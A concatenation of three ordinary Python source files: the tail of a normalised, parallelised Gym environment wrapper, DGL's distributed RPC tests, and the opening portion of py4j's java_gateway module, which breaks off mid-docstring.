obs = self._obs_rms.normalize(obs)
if done:
self._obs_rms.update()
return obs
def reset(self):
ob = super().reset()
if self._normalize_obs:
return self._update_obs(ob, False)
return ob
def step(self, action):
if self._scale_continuous_actions:
if isinstance(self.env.action_space, Box):
# rescale the action
lb, ub = self.env.action_space.low, self.env.action_space.high
scaled_action = lb + (action[0] + 1.) * 0.5 * (ub - lb)
scaled_action = np.clip(scaled_action, lb, ub)
action = scaled_action
wrapped_step = self.env.step(action)
next_obs, reward, done, info = wrapped_step
if self._normalize_obs:
next_obs = self._update_obs(next_obs, done)
if self._normalize_rewards:
reward = self._update_rewards(reward, done)
return next_obs, reward * self._scale_reward, done, info
def __str__(self):
return "Normalized GymEnv: %s" % self.env
class RunningMeanStd(object):
"""
RunningMeanStd
"""
def __init__(self, shape, min_std=1e-6, clip_val=None):
self._min_std = min_std
self._clip_val = clip_val
self._cache = []
self._mean = np.zeros(shape)
self._std = np.ones(shape)
self._count = 0.
def normalize(self, x):
xn = (x - self._mean) / self._std
if self._clip_val:
xn = np.clip(xn, -self._clip_val, self._clip_val)
if np.isscalar(x):
return np.asscalar(xn)
return xn
def cache(self, x):
self._cache.append(x)
def update(self):
X = np.array(self._cache)
if X.shape[0] <= 1:
# wait for more data to avoid numerical errors in std calc
return
avg_X = np.mean(X, axis=0)
std_X = np.std(X, axis=0, ddof=1)
if self._count == 0:
self._std = np.clip(std_X, self._min_std, None)
self._mean = avg_X
self._count += X.shape[0]
else:
delta = avg_X - self._mean
m_a = np.square(self._std) * (self._count - 1)
m_b = np.square(std_X) * (X.shape[0] - 1)
M2 = m_a + m_b + delta ** 2 * self._count * X.shape[0] /\
(self._count + X.shape[0])
M2 = np.sqrt(M2 / (self._count + X.shape[0] - 1))
self._std = np.clip(M2, self._min_std, None)
self._count += X.shape[0]
self._mean = self._mean + delta * X.shape[0] / self._count
self._cache = []
def get_wrapper_by_name(env, classname):
currentenv = env
while True:
if classname in currentenv.__class__.__name__:
return currentenv
elif hasattr(env, 'env'):
currentenv = currentenv.env
else:
raise ValueError(
'Could not find wrapper named {}'.format(classname))
def make_parallel_envs(env_id, num_envs, start_seed, is_atari, **kwargs):
envs = [NormalizedGymEnv(env_id, is_atari=is_atari, **kwargs)
for _ in range(num_envs)]
[envs[i].seed(start_seed + i) for i in range(num_envs)]
return envs
def worker(remote, parent_remote, env):
"""
Taken from OpenAI baselines
"""
parent_remote.close()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
elif cmd == 'seed':
remote.send((env.seed(data)))
elif cmd == 'get_episode_rewards':
remote.send(
get_wrapper_by_name(env, 'MonitorEnv').get_episode_rewards())
elif cmd == 'get_total_steps':
remote.send(
get_wrapper_by_name(env, 'MonitorEnv').get_total_steps())
else:
raise NotImplementedError
class ParallelEnvs:
"""
Adapted from OpenAI baselines
"""
def __init__(self, env_id, num_envs, start_seed=1, is_atari=True,
**kwargs):
"""
:param env_id: str, environment id
:param num_envs: int, number of environments
:param start_seed: int, seed for environment, gets incremented by 1
for each additional env
"""
envs = make_parallel_envs(env_id, num_envs,
start_seed, is_atari, **kwargs)
self.envs = envs
self.start_seed = start_seed
self.env_id = env_id
self.waiting = False
self.closed = False
self.num_envs = len(envs)
self.parents, self.children = zip(
*[Pipe() for _ in range(self.num_envs)])
self.ps = [
Process(target=worker, args=(child, parent, env))
for (child, parent, env) in
zip(self.children, self.parents, envs)]
for p in self.ps:
# daemons are killed if parent is killed
p.daemon = True
p.start()
for child in self.children:
child.close()
self.parents[0].send(('get_spaces', None))
observation_space, action_space = self.parents[0].recv()
self.observation_space = observation_space
self.action_space = action_space
self.spec = envs[0].spec
self.is_atari = is_atari
def step_async(self, actions):
for parent, action in zip(self.parents, actions):
parent.send(('step', action))
self.waiting = True
def step_wait(self):
results = [parent.recv() for parent in self.parents]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for parent in self.parents:
parent.send(('reset', None))
return np.stack([parent.recv() for parent in self.parents])
def step(self, actions):
self.step_async(actions)
return self.step_wait()
def get_episode_rewards(self, last_n=None):
"""
:param last_n: int, get the last_n rewards per env
"""
for parent in self.parents:
parent.send(('get_episode_rewards', None))
results = [parent.recv() for parent in self.parents]
if last_n:
results = [r[-last_n:] for r in results]
flat_results = []
for r in results:
flat_results.extend(r)
return flat_results
def get_total_steps(self):
for parent in self.parents:
parent.send(('get_total_steps', None))
results = [parent.recv() for parent in self.parents]
return results
def seed(self, i):
for parent in self.parents:
parent.send(('seed', i))
i += 1
return [parent.recv() for parent in self.parents]
def close(self):
if self.closed:
return
if self.waiting:
for parent in self.parents:
parent.recv()
for parent in self.parents:
parent.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
|
test_rpc.py
|
import os
import time
import socket
import dgl
import backend as F
import unittest, pytest
import multiprocessing as mp
from numpy.testing import assert_array_equal
if os.name != 'nt':
import fcntl
import struct
INTEGER = 2
STR = 'hello world!'
HELLO_SERVICE_ID = 901231
TENSOR = F.zeros((10, 10), F.int64, F.cpu())
def get_local_usable_addr():
"""Get local usable IP and port
Returns
-------
str
IP address, e.g., '192.168.8.12:50051'
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
sock.connect(('10.255.255.255', 1))
ip_addr = sock.getsockname()[0]
except ValueError:
ip_addr = '127.0.0.1'
finally:
sock.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", 0))
sock.listen(1)
port = sock.getsockname()[1]
sock.close()
return ip_addr + ' ' + str(port)
def foo(x, y):
assert x == 123
assert y == "abc"
class MyRequest(dgl.distributed.Request):
def __init__(self):
self.x = 123
self.y = "abc"
self.z = F.randn((3, 4))
self.foo = foo
def __getstate__(self):
return self.x, self.y, self.z, self.foo
def __setstate__(self, state):
self.x, self.y, self.z, self.foo = state
def process_request(self, server_state):
pass
class MyResponse(dgl.distributed.Response):
def __init__(self):
self.x = 432
def __getstate__(self):
return self.x
def __setstate__(self, state):
self.x = state
def simple_func(tensor):
return tensor
class HelloResponse(dgl.distributed.Response):
def __init__(self, hello_str, integer, tensor):
self.hello_str = hello_str
self.integer = integer
self.tensor = tensor
def __getstate__(self):
return self.hello_str, self.integer, self.tensor
def __setstate__(self, state):
self.hello_str, self.integer, self.tensor = state
class HelloRequest(dgl.distributed.Request):
def __init__(self, hello_str, integer, tensor, func):
self.hello_str = hello_str
self.integer = integer
self.tensor = tensor
self.func = func
def __getstate__(self):
return self.hello_str, self.integer, self.tensor, self.func
def __setstate__(self, state):
self.hello_str, self.integer, self.tensor, self.func = state
def process_request(self, server_state):
assert self.hello_str == STR
assert self.integer == INTEGER
new_tensor = self.func(self.tensor)
res = HelloResponse(self.hello_str, self.integer, new_tensor)
return res
def start_server(num_clients, ip_config):
print("Sleep 5 seconds to test client re-connect.")
time.sleep(5)
server_state = dgl.distributed.ServerState(None, local_g=None, partition_book=None)
dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest, HelloResponse)
dgl.distributed.start_server(server_id=0,
ip_config=ip_config,
num_clients=num_clients,
server_state=server_state)
def start_client(ip_config):
dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest, HelloResponse)
dgl.distributed.connect_to_server(ip_config=ip_config)
req = HelloRequest(STR, INTEGER, TENSOR, simple_func)
# test send and recv
dgl.distributed.send_request(0, req)
res = dgl.distributed.recv_response()
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test remote_call
target_and_requests = []
for i in range(10):
target_and_requests.append((0, req))
res_list = dgl.distributed.remote_call(target_and_requests)
for res in res_list:
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test send_request_to_machine
dgl.distributed.send_request_to_machine(0, req)
res = dgl.distributed.recv_response()
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test remote_call_to_machine
target_and_requests = []
for i in range(10):
target_and_requests.append((0, req))
res_list = dgl.distributed.remote_call_to_machine(target_and_requests)
for res in res_list:
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
def test_serialize():
from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload
SERVICE_ID = 12345
dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse)
req = MyRequest()
data, tensors = serialize_to_payload(req)
req1 = deserialize_from_payload(MyRequest, data, tensors)
req1.foo(req1.x, req1.y)
assert req.x == req1.x
assert req.y == req1.y
assert F.array_equal(req.z, req1.z)
res = MyResponse()
data, tensors = serialize_to_payload(res)
res1 = deserialize_from_payload(MyResponse, data, tensors)
assert res.x == res1.x
def test_rpc_msg():
from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload, RPCMessage
SERVICE_ID = 32452
dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse)
req = MyRequest()
data, tensors = serialize_to_payload(req)
rpcmsg = RPCMessage(SERVICE_ID, 23, 0, 1, data, tensors)
assert rpcmsg.service_id == SERVICE_ID
assert rpcmsg.msg_seq == 23
assert rpcmsg.client_id == 0
assert rpcmsg.server_id == 1
assert len(rpcmsg.data) == len(data)
assert len(rpcmsg.tensors) == 1
assert F.array_equal(rpcmsg.tensors[0], req.z)
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_rpc():
ip_config = open("rpc_ip_config.txt", "w")
ip_addr = get_local_usable_addr()
ip_config.write('%s 1\n' % ip_addr)
ip_config.close()
ctx = mp.get_context('spawn')
pserver = ctx.Process(target=start_server, args=(1, "rpc_ip_config.txt"))
pclient = ctx.Process(target=start_client, args=("rpc_ip_config.txt",))
pserver.start()
time.sleep(1)
pclient.start()
pserver.join()
pclient.join()
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_multi_client():
ip_config = open("rpc_ip_config_mul_client.txt", "w")
ip_addr = get_local_usable_addr()
ip_config.write('%s 1\n' % ip_addr)
ip_config.close()
ctx = mp.get_context('spawn')
pserver = ctx.Process(target=start_server, args=(10, "rpc_ip_config_mul_client.txt"))
pclient_list = []
for i in range(10):
pclient = ctx.Process(target=start_client, args=("rpc_ip_config_mul_client.txt",))
pclient_list.append(pclient)
pserver.start()
for i in range(10):
pclient_list[i].start()
for i in range(10):
pclient_list[i].join()
pserver.join()
if __name__ == '__main__':
test_serialize()
test_rpc_msg()
test_rpc()
test_multi_client()
|
java_gateway.py
|
# -*- coding: UTF-8 -*-
"""Module to interact with objects in a Java Virtual Machine from a
Python Virtual Machine.
Variables that might clash with the JVM start with an underscore
(Java Naming Convention do not recommend to start with an underscore
so clashes become unlikely).
Created on Dec 3, 2009
:author: Barthelemy Dagenais
"""
from __future__ import unicode_literals, absolute_import
from collections import deque
import logging
import os
from pydoc import pager
import select
import socket
import struct
from subprocess import Popen, PIPE
import subprocess
import sys
import traceback
import ctypes
from threading import Thread, RLock
import weakref
import json
from py4j.compat import (
range, hasattr2, basestring, CompatThread, Queue)
from py4j.finalizer import ThreadSafeFinalizer
from py4j import protocol as proto
from py4j.protocol import (
Py4JError, Py4JJavaError, Py4JNetworkError, Py4JThreadCancelledError,
Py4JAuthenticationError,
get_command_part, get_return_value,
register_output_converter, smart_decode, escape_new_line,
is_fatal_error, is_error, unescape_new_line,
get_error_message, compute_exception_message)
from py4j.signals import Signal
from py4j.version import __version__
class NullHandler(logging.Handler):
def emit(self, record):
pass
null_handler = NullHandler()
logging.getLogger("py4j").addHandler(null_handler)
logger = logging.getLogger("py4j.java_gateway")
BUFFER_SIZE = 4096
DEFAULT_ADDRESS = "127.0.0.1"
DEFAULT_PORT = 25333
DEFAULT_PYTHON_PROXY_PORT = 25334
DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER = "DEFAULT"
DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT = 5
PY4J_SKIP_COLLECTIONS = "PY4J_SKIP_COLLECTIONS"
PY4J_TRUE = {"yes", "y", "t", "true"}
server_connection_stopped = Signal()
"""Signal sent when a Python (Callback) Server connection is stopped.
Will supply the ``connection`` argument, an instance of CallbackConnection.
The sender is the CallbackServer instance.
"""
server_connection_started = Signal()
"""Signal sent when a Python (Callback) Server connection is started.
Will supply the ``connection`` argument, an instance of CallbackConnection.
The sender is the CallbackServer instance.
"""
server_connection_error = Signal()
"""Signal sent when a Python (Callback) Server encounters an error while
waiting for a connection.
Will supply the ``error`` argument, an instance of Exception.
The sender is the CallbackServer instance.
"""
server_started = Signal()
"""Signal sent when a Python (Callback) Server is started
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
server_stopped = Signal()
"""Signal sent when a Python (Callback) Server is stopped
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
pre_server_shutdown = Signal()
"""Signal sent when a Python (Callback) Server is about to shut down.
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
post_server_shutdown = Signal()
"""Signal sent when a Python (Callback) Server is shutted down.
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
def get_create_new_process_group_kwargs():
"""Ensures that the child process is created in another process group.
This prevents signals such as SIGINT from propagating to the JVM.
"""
if os.name != "nt":
kwargs = {"preexec_fn": os.setpgrp}
else:
kwargs = {"creationflags": subprocess.CREATE_NEW_PROCESS_GROUP}
return kwargs
def set_reuse_address(server_socket):
"""Sets reuse address option if not on windows.
On windows, the SO_REUSEADDR option means that multiple server sockets can
be bound to the same address (it has nothing to do with TIME_WAIT).
"""
if os.name != "nt":
server_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def set_default_callback_accept_timeout(accept_timeout):
"""Sets default accept timeout of callback server.
"""
deprecated("set_default_callback_accept_timeout", "1.0",
"CallbackServerParameters")
global DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT
DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT = accept_timeout
def deprecated(name, last_version, use_instead="", level=logging.DEBUG,
raise_exc=False):
if not use_instead:
msg = "{0} is deprecated and will be removed in version {1}"\
.format(name, last_version)
else:
msg = "{0} is deprecated and will be removed in version {1}. "\
"Use {2} instead."\
.format(name, last_version, use_instead)
logger.log(level, msg)
if raise_exc:
raise DeprecationWarning(msg)
def java_import(jvm_view, import_str):
"""Imports the package or class specified by `import_str` in the
jvm view namespace.
:param jvm_view: The jvm_view in which to import a class/package.
:import_str: The class (e.g., java.util.List) or the package
(e.g., java.io.*) to import
"""
gateway_client = jvm_view._gateway_client
command = proto.JVMVIEW_COMMAND_NAME + proto.JVM_IMPORT_SUB_COMMAND_NAME +\
jvm_view._id + "\n" + escape_new_line(import_str) + "\n" +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
return_value = get_return_value(answer, gateway_client, None, None)
return return_value
def find_jar_path():
"""Tries to find the path where the py4j jar is located.
"""
paths = []
jar_file = "py4j{0}.jar".format(__version__)
maven_jar_file = "py4j-{0}.jar".format(__version__)
paths.append(jar_file)
# ant
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../../../py4j-java/" + jar_file))
# with gradle 5, and renaming the jar to the standard "py4j-__version__.jar"
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../../../py4j-java/" + maven_jar_file))
# maven
paths.append(os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"../../../py4j-java/target/" + maven_jar_file))
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../share/py4j/" + jar_file))
paths.append("../../../current-release/" + jar_file)
paths.append(os.path.join(sys.prefix, "share/py4j/" + jar_file))
# pip install py4j # On Ubuntu 16.04, where virtualenvepath=/usr/local
# this file is here:
# virtualenvpath/lib/pythonX/dist-packages/py4j/java_gateway.py
# the jar file is here: virtualenvpath/share/py4j/py4j.jar
# pip install --user py4j # On Ubuntu 16.04, where virtualenvepath=~/.local
# this file is here:
# virtualenvpath/lib/pythonX/site-packages/py4j/java_gateway.py
# the jar file is here: virtualenvpath/share/py4j/py4j.jar
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../../../../share/py4j/" + jar_file))
for path in paths:
if os.path.exists(path):
return path
return ""
def launch_gateway(port=0, jarpath="", classpath="", javaopts=[],
die_on_exit=False, redirect_stdout=None,
redirect_stderr=None, daemonize_redirect=True,
java_path="java", create_new_process_group=False,
enable_auth=False):
"""Launch a `Gateway` in a new Java process.
The redirect parameters accept file-like objects, Queue, or deque. When
text lines are sent to the stdout or stderr of the child JVM, these lines
are redirected to the file-like object (``write(line)``), the Queue
(``put(line)``), or the deque (``appendleft(line)``).
The text line will contain a newline character.
Only text output is accepted on stdout and stderr. If you wish to
communicate with the child JVM through bytes, you need to create your own
helper function.
:param port: the port to launch the Java Gateway on. If no port is
specified then an ephemeral port is used.
:param jarpath: the path to the Py4J jar. Only necessary if the jar
was installed at a non-standard location or if Python is using
a different `sys.prefix` than the one that Py4J was installed
under.
:param classpath: the classpath used to launch the Java Gateway.
:param javaopts: an array of extra options to pass to Java (the classpath
should be specified using the `classpath` parameter, not `javaopts`.)
:param die_on_exit: if `True`, the Java gateway process will die when
this Python process exits or is killed.
:param redirect_stdout: where to redirect the JVM stdout. If None (default)
stdout is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param redirect_stderr: where to redirect the JVM stdout. If None (default)
stderr is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time to
these objects.
:param daemonize_redirect: if True, the consumer threads will be daemonized
and will not prevent the main Python process from exiting. This means
the file descriptors (stderr, stdout, redirect_stderr, redirect_stdout)
might not be properly closed. This is not usually a problem, but in
case of errors related to file descriptors, set this flag to False.
:param java_path: If None, Py4J will use $JAVA_HOME/bin/java if $JAVA_HOME
is defined, otherwise it will use "java".
:param create_new_process_group: If True, the JVM is started in a new
process group. This ensures that signals sent to the parent Python
process are not forwarded to the JVM. For example, sending
Ctrl-C/SIGINT won't interrupt the JVM. If the python process dies, the
Java process will stay alive, which may be a problem for some scenarios
though.
:param enable_auth: If True, the server will require clients to provide an
authentication token when connecting.
:rtype: the port number of the `Gateway` server or, when auth enabled,
a 2-tuple with the port number and the auth token.
"""
popen_kwargs = {}
if not jarpath:
jarpath = find_jar_path()
if not java_path:
java_home = os.environ.get("JAVA_HOME")
if java_home:
java_path = os.path.join(java_home, "bin", "java")
else:
java_path = "java"
# Fail if the jar does not exist.
if not os.path.exists(jarpath):
raise Py4JError("Could not find py4j jar at {0}".format(jarpath))
# Launch the server in a subprocess.
classpath = os.pathsep.join((jarpath, classpath))
command = [java_path, "-classpath", classpath] + javaopts + \
["py4j.GatewayServer"]
if die_on_exit:
command.append("--die-on-broken-pipe")
if enable_auth:
command.append("--enable-auth")
command.append(str(port))
logger.debug("Launching gateway with command {0}".format(command))
# stderr redirection
close_stderr = False
if redirect_stderr is None:
stderr = open(os.devnull, "w")
close_stderr = True
elif isinstance(redirect_stderr, Queue) or\
isinstance(redirect_stderr, deque):
stderr = PIPE
else:
stderr = redirect_stderr
# we don't need this anymore
redirect_stderr = None
# stdout redirection
if redirect_stdout is None:
redirect_stdout = open(os.devnull, "w")
if create_new_process_group:
popen_kwargs.update(get_create_new_process_group_kwargs())
proc = Popen(command, stdout=PIPE, stdin=PIPE, stderr=stderr,
**popen_kwargs)
# Determine which port the server started on (needed to support
# ephemeral ports)
_port = int(proc.stdout.readline())
# Read the auth token from the server if enabled.
_auth_token = None
if enable_auth:
_auth_token = proc.stdout.readline()[:-1]
# Start consumer threads so process does not deadlock/hangs
OutputConsumer(
redirect_stdout, proc.stdout, daemon=daemonize_redirect).start()
if redirect_stderr is not None:
OutputConsumer(
redirect_stderr, proc.stderr, daemon=daemonize_redirect).start()
ProcessConsumer(proc, [redirect_stdout], daemon=daemonize_redirect).start()
if close_stderr:
# XXX This will quiet ResourceWarning in Python 3.5+
# This only close the fd in this process, not in the JVM process, which
# makes sense.
quiet_close(stderr)
if enable_auth:
return (_port, _auth_token)
else:
return _port
def get_field(java_object, field_name):
"""Retrieves the field named `field_name` from the `java_object`.
This function is useful when `auto_field=false` in a gateway or
Java object.
:param java_object: the instance containing the field
:param field_name: the name of the field to retrieve
"""
command = proto.FIELD_COMMAND_NAME + proto.FIELD_GET_SUBCOMMAND_NAME +\
java_object._target_id + "\n" + field_name + "\n" +\
proto.END_COMMAND_PART
answer = java_object._gateway_client.send_command(command)
has_error, error_message = get_error_message(answer)
if answer == proto.NO_MEMBER_COMMAND or has_error:
message = compute_exception_message(
"no field {0} in object {1}".format(
field_name, java_object._target_id), error_message)
raise Py4JError(message)
else:
return get_return_value(
answer, java_object._gateway_client, java_object._target_id,
field_name)
def set_field(java_object, field_name, value):
"""Sets the field named `field_name` of `java_object` to `value`.
This function is the only way to set a field because the assignment
operator in Python cannot be overloaded.
:param java_object: the instance containing the field
:param field_name: the name of the field to set
:param value: the value to assign to the field
"""
command_part = get_command_part(
value,
java_object._gateway_client.gateway_property.pool)
command = proto.FIELD_COMMAND_NAME + proto.FIELD_SET_SUBCOMMAND_NAME +\
java_object._target_id + "\n" + field_name + "\n" +\
command_part + proto.END_COMMAND_PART
answer = java_object._gateway_client.send_command(command)
has_error, error_message = get_error_message(answer)
if answer == proto.NO_MEMBER_COMMAND or has_error:
message = compute_exception_message(
"no field {0} in object {1}".format(
field_name, java_object._target_id), error_message)
raise Py4JError(message)
return get_return_value(
answer, java_object._gateway_client, java_object._target_id,
field_name)
def get_method(java_object, method_name):
"""Retrieves a reference to the method of an object.
This function is useful when `auto_field=true` and an instance field has
the same name as a method. The full signature of the method is not
required: it is determined when the method is called.
:param java_object: the instance containing the method
:param method_name: the name of the method to retrieve
"""
return JavaMember(
method_name, java_object, java_object._target_id,
java_object._gateway_client)
def is_instance_of(gateway, java_object, java_class):
"""Indicates whether a java object is an instance of the provided
java_class.
:param gateway: the JavaGateway instance
:param java_object: the JavaObject instance
:param java_class: can be a string (fully qualified name), a JavaClass
instance, or a JavaObject instance)
"""
if isinstance(java_class, basestring):
param = java_class
elif isinstance(java_class, JavaClass):
param = java_class._fqn
elif isinstance(java_class, JavaObject):
param = java_class.getClass()
else:
raise Py4JError(
"java_class must be a string, a JavaClass, or a JavaObject")
return gateway.jvm.py4j.reflection.TypeUtil.isInstanceOf(
param, java_object)
def get_java_class(java_class):
"""Returns the java.lang.Class of a JavaClass. This is equivalent to
calling .class in Java.
:param java_class: An instance of JavaClass
:rtype: An instance of JavaObject that corresponds to a java.lang.Class
"""
return java_class._java_lang_class
def quiet_close(closable):
"""Quietly closes a closable object without throwing an exception.
:param closable: Object with a ``close`` method.
"""
if closable is None:
# Do not attempt to close a None. This logs unecessary exceptions.
return
try:
closable.close()
except Exception:
logger.debug("Exception while closing", exc_info=True)
def quiet_shutdown(socket_instance):
"""Quietly shuts down a socket without throwing an exception.
:param socket_instance: Socket with ``shutdown`` method.
"""
if socket_instance is None:
# Do not attempt to close a None. This logs unecessary exceptions.
return
try:
socket_instance.shutdown(socket.SHUT_RDWR)
except Exception:
logger.debug("Exception while shutting down a socket", exc_info=True)
def set_linger(a_socket):
"""Sets SO_LINGER to true, 0 to send a RST packet. This forcibly closes the
connection and the remote socket should fail on write and should not need
to read to realize that the socket was closed.
Only use on timeout and maybe shutdown because it does not terminate the
TCP connection normally.
"""
l_onoff = 1
l_linger = 0
a_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack(b'ii', l_onoff, l_linger))
def check_connection(a_socket, read_timeout):
"""Checks that a socket is ready to receive by reading from it.
If the read times out, this is a good sign. If the read returns an
empty string, this usually means that the socket was remotely closed.
:param a_socket: The socket to read from.
:param read_timeout: The read_timeout to restore the socket to.
"""
a_socket.settimeout(0.0001)
response = 0
try:
response = a_socket.recv(2)
except socket.timeout:
# Do nothing this is expected!
pass
finally:
a_socket.settimeout(read_timeout)
if response == b"":
raise Exception("The connection was remotely closed.")
def gateway_help(gateway_client, var, pattern=None, short_name=True,
display=True):
"""Displays a help page about a class or an object.
:param gateway_client: The gatway client
:param var: JavaObject, JavaClass or JavaMember for which a help page
will be generated.
:param pattern: Star-pattern used to filter the members. For example
"get*Foo" may return getMyFoo, getFoo, getFooBar, but not bargetFoo.
The pattern is matched against the entire signature. To match only
the name of a method, use "methodName(*".
:param short_name: If True, only the simple name of the parameter
types and return types will be displayed. If False, the fully
qualified name of the types will be displayed.
:param display: If True, the help page is displayed in an interactive
page similar to the `help` command in Python. If False, the page is
returned as a string.
"""
if hasattr2(var, "_get_object_id"):
command = proto.HELP_COMMAND_NAME +\
proto.HELP_OBJECT_SUBCOMMAND_NAME +\
var._get_object_id() + "\n" +\
get_command_part(pattern) +\
get_command_part(short_name) +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
elif hasattr2(var, "_fqn"):
command = proto.HELP_COMMAND_NAME +\
proto.HELP_CLASS_SUBCOMMAND_NAME +\
var._fqn + "\n" +\
get_command_part(pattern) +\
get_command_part(short_name) +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
elif hasattr2(var, "container") and hasattr2(var, "name"):
if pattern is not None:
raise Py4JError("pattern should be None with var is a JavaMember")
pattern = var.name + "(*"
var = var.container
return gateway_help(
gateway_client, var, pattern, short_name=short_name,
display=display)
else:
raise Py4JError(
"var is none of Java Object, Java Class or Java Member")
help_page = get_return_value(answer, gateway_client, None, None)
if (display):
pager(help_page)
else:
return help_page
def do_client_auth(command, input_stream, sock, auth_token):
"""Receives and decodes a auth token.
- If the token does not match, an exception is raised.
- If the command received is not an Auth command, an exception is raised.
- If an exception occurs, it is wrapped in a Py4JAuthenticationError.
- Otherwise, it returns True.
"""
try:
if command != proto.AUTH_COMMAND_NAME:
raise Py4JAuthenticationError("Expected {}, received {}.".format(
proto.AUTH_COMMAND_NAME, command))
client_token = smart_decode(input_stream.readline()[:-1])
# Remove the END marker
input_stream.readline()
if auth_token == client_token:
success = proto.OUTPUT_VOID_COMMAND.encode("utf-8")
sock.sendall(success)
else:
error = proto.ERROR_RETURN_MESSAGE.encode("utf-8")
# TODO AUTH Send error message with the error?
sock.sendall(error)
raise Py4JAuthenticationError("Client authentication failed.")
except Py4JAuthenticationError:
raise
except Exception as e:
logger.exception(
"An exception occurred while trying to authenticate "
"a connection")
raise Py4JAuthenticationError(cause=e)
return True
def _garbage_collect_object(gateway_client, target_id):
try:
try:
ThreadSafeFinalizer.remove_finalizer(
smart_decode(gateway_client.address) +
smart_decode(gateway_client.port) +
target_id)
gateway_client.garbage_collect_object(target_id)
except Exception:
logger.debug(
"Exception while garbage collecting an object",
exc_info=True)
except Exception:
# Maybe logger is dead at this point.
pass
def _garbage_collect_connection(socket_instance):
"""Closes the socket if auto_delete is True and the socket is opened.
This is an acceptable practice if you know that your Python VM implements
garbage collection and closing sockets immediately is not a concern.
Otherwise, it is always better (because it is predictable) to explicitly
close the socket by calling `GatewayConnection.close()`.
"""
try:
if socket_instance is not None:
quiet_shutdown(socket_instance)
quiet_close(socket_instance)
except Exception:
# Maybe logger used by quiet_* is dead at this point
pass
def _garbage_collect_proxy(pool, proxy_id):
"""Removes a proxy from the pool of python proxies.
Do not remove special proxies such as the entry point.
Note: even though this function starts with _garbage_collect,
it is not called withing a weakref lambda. This is only a private function.
"""
success = False
if proxy_id != proto.ENTRY_POINT_OBJECT_ID:
try:
del(pool[proxy_id])
success = True
except KeyError:
logger.warning(
"Tried to garbage collect non existing python proxy {0}"
.format(proxy_id))
return success
class OutputConsumer(CompatThread):
"""Thread that consumes output
"""
def __init__(self, redirect, stream, *args, **kwargs):
super(OutputConsumer, self).__init__(*args, **kwargs)
self.redirect = redirect
self.stream = stream
if isinstance(redirect, Queue):
self.redirect_func = self._pipe_queue
if isinstance(redirect, deque):
self.redirect_func = self._pipe_deque
if hasattr2(redirect, "write"):
self.redirect_func = self._pipe_fd
def _pipe_queue(self, line):
self.redirect.put(line)
def _pipe_deque(self, line):
self.redirect.appendleft(line)
def _pipe_fd(self, line):
self.redirect.write(line)
def run(self):
lines_iterator = iter(self.stream.readline, b"")
for line in lines_iterator:
self.redirect_func(smart_decode(line))
class ProcessConsumer(CompatThread):
"""Thread that ensures process stdout and stderr are properly closed.
"""
def __init__(self, proc, closable_list, *args, **kwargs):
super(ProcessConsumer, self).__init__(*args, **kwargs)
self.proc = proc
if closable_list:
# We don't care if it contains queues or deques, quiet_close will
# just ignore them.
self.closable_list = closable_list
else:
self.closable_list = []
def run(self):
self.proc.wait()
quiet_close(self.proc.stdout)
quiet_close(self.proc.stderr)
for closable in self.closable_list:
quiet_close(closable)
class GatewayParameters(object):
"""Wrapper class that contains all parameters that can be passed to
configure a `JavaGateway`
"""
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PORT, auto_field=False,
auto_close=True, auto_convert=False, eager_load=False,
ssl_context=None, enable_memory_management=True,
read_timeout=None, auth_token=None):
"""
:param address: the address to which the client will request a
connection. If you're assing a `SSLContext` with
`check_hostname=True` then this address must match
(one of) the hostname(s) in the certificate the gateway
server presents.
:param port: the port to which the client will request a connection.
Default is 25333.
:param auto_field: if `False`, each object accessed through this
gateway won"t try to lookup fields (they will be accessible only by
calling get_field). If `True`, fields will be automatically looked
up, possibly hiding methods of the same name and making method
